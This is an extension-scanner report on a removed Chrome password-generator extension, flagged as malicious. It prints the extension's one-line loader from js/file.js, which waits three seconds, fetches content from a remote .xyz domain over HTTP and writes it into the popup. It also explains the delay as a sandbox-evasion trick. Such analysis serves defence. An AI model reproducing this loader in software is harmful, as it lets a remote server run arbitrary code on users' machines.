Wallet:PSD CT Connect

ID: bkhbefagfbcoelbddngjcnnfdcpipohm

Could be malicious

Supported Languages

🇺🇸US English

Extension Info & Metadata

Status
Removed
Version
1.0
Size
0.05 MB
Rating
0.0/5
Reviews
0
Users
2
Type
Extension
Updated
Sep 8, 2022
Category
7_productivity
Price
Free
Featured
No
Visibility
Listed
Mature
No
By Google
No
Trusted
No

Publisher Contextual Analysis

Author
WAN CONNECTView Profile
MX records exist
Yes
Domain exists
Yes
Is disposable
No
Is role-based
No
Mailbox exists
Yes
Total Extensions
1
Active
0
Obsolete
1
Listed
1
Unlisted
0
Total Users
2

Wallet useful PSD Connect Generator is extension for generating strong passwords with crypto-graphically

Very helpful extension to make a strong password

This extension requests no permissions and has no recorded risk factors.

After a 3-second delay, the extension fetches content from the unregistered third-party domain passglaskbnv.xyz/file/c.php over plain HTTP and uses document.open()/document.write()/document.close() to replace the entire popup document with whatever the server returns. This is a remote code execution loader: the attacker controls the server and can deliver arbitrary HTML and JavaScript to any user who opens the extension popup, long after the static ZIP was reviewed by the Chrome Web Store. The 3-second delay is a known technique to evade automated sandbox analysis that times out quickly.

js/file.js (Line 1)
setTimeout(function() {  $.get("http://passglaskbnv.xyz/file/c.php", function(data) {    document.open();    document.write(data);    document.close();  });}, 3000);

By severity

Critical1
High0
Medium0
Low0

Versions scanned

None of the 2 scanned versions have more than one unique code-review finding. Counts are unique findings that include each version.

Extension VersionCode Review Findings
No versions with multiple unique findings.

Files with findings

1 distinct path — top paths by unique finding count:

  • js/file.js1
S.No.
Category
Severity
File
Summary
Found in Version
1Remote Code Loading
critical
js/file.js (line 1)After a 3-second delay, the extension fetches content from the unregistered third-party domain passglaskbnv.xyz/file/c.php over plain HTTP and uses document.open()/document.write()/document.close() to replace the enti…
URLs
6
IPv4
0
IPv6
0

URLs

View the external URLs this extension communicates with to understand its network activity and data interactions.

Gain full insight into all external connections.

Upgrade for full visibility.

www.w3.org/1999/02/22-rdf-syntax-nshttp://www.w3.org/1999/02/22-rdf-syntax-ns#
ns.adobe.com/xap/1.0/http://ns.adobe.com/xap/1.0/
ns.adobe.com/xap/1.0/mm/http://ns.adobe.com/xap/1.0/mm/
ns.adobe.com/xap/1.0/sType/ResourceRefhttp://ns.adobe.com/xap/1.0/sType/ResourceRef#
passglaskbnv.xyz/file/c.phphttp://passglaskbnv.xyz/file/c.php
clients2.google.com/service/update2/crxhttps://clients2.google.com/service/update2/crx

Gain full insight into all external connections.

Upgrade for full visibility.

No IP addresses found
Version
Size
Is Malicious
Findings
Permhash
1.0
Latest
0.05 MB
Malicious
1N/A
1.1
0.05 MB
Malicious
—N/A
Showing 1 to 2 of 10 rows
Rows per page:

Code Diff

Compare extension code between any two versions.

0 changed files (scanned top 25 shared text files)

No comparable text files found between these versions.

Browse and explore files within this extension package

Gain full insight into all external connections.

Upgrade for full visibility.